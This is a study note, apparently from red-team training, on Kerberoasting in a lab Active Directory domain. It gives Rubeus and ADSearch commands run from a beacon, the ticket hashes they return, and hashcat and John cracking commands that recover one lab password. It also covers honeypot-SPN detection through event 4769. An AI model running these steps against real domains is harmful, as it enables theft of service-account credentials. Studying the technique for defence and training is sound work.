Secondary Categories: 02 - Cryptography 02 - Initial Access Links: Password Cracking Search Tag:📕
Kerberoasting
Description:
Services run on a machine under the context of a user accoun. These accounts are either local to the machine (LocalSystem, LocalService, NetworkService) or are domain accounts. A Service Principle Nmae (SPN) is a unique identified of a service instance. SPNs are user with Kerberos to associate a service instance with a logon account and are configured on the User Object in AD.
Part of the TGS returned by the KDC is encrupted with a secret dericed from the password of the user account running that service. Kerbroasting is a technique for reqesting TGS for services running user the context of domain accounts and cracking them offline to reveal their plaintext passwords. Rebeus kerberoast can be used to perform kerberoasting. Running it without further arguments will roast every account in the domain that has an SPN (excluding krbtgt).
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
[*] Action: Kerberoasting
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 3
$krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:[email protected]*$CC1E7D[...]331F0E
$krb5tgs$23$*squid_svc$dev.cyberbotic.io$HTTP/[email protected]*$55AACE[...]45F184
$krb5tgs$23$*honey_svc$dev.cyberbotic.io$HoneySvc/[email protected]*$530955[...]626817
Even though Rebeus does not include the krbtgt account is can sometimes be cracked.
Hashcat
These hashes can be cracked offline to recover the plain text passwords for the accounts use --format=krb5tgs --wordlist=wordlist hashes -a 0 -m 13100 hashes wordlist for hashcat
John
$ john --format=krb5tgs --wordlist=wordlist mssql_svc
Cyberb0tic (mssql_svc$dev.cyberbotic.io)
The hash format for John should be as follows:
$krb5tgs$23$*mssql_svc$dev.cyberbotic.io*$6A9E[blah]
NOTICE By default, Rebeus will roast every account that has an SPN. HoneyPot accounts can be configured with a fake SPN, which will generate a 4769 event when roasted. Since these event will never be generated for this service it provides a high-fidelity indication of this attack.
event.code: 4769 and winlog.event_data.ServiceName: honey_svc
A safer approach is to enumerate possible canidates first and roast them selectively. This LDAP query will find domain users who have ab SPN set.
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
[*] TOTAL NUMBER OF SEARCH RESULTS: 4
[+] cn : krbtgt
[+] servicePrincipalName : kadmin/changepw
[+] samaccountname : krbtgt
[+] cn : MS SQL Service
[+] servicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
[+] samaccountname : mssql_svc
[+] cn : Squid Proxy
[+] servicePrincipalName : HTTP/squid.dev.cyberbotic.io
[+] samaccountname : squid_svc
[+] cn : Honey Token
[+] servicePrincipalName : HoneySvc/fake.dev.cyberbotic.io
[+] samaccountname : honey_svcWe can also roast individual accounts with the /user parameter.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
[*] SamAccountName : mssql_svc
[*] DistinguishedName : CN=MS SQL Service,CN=Users,DC=dev,DC=cyberbotic,DC=io
[*] ServicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
[*] PwdLastSet : 8/15/2022 7:46:43 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:[email protected]*$CC1E7D[...]331F0EResources:
| Title | URL |
|---|---|
| place | holder |
Created Date: November 20th 2022 16:28
Last Modified Date: November 20th 2022 16:28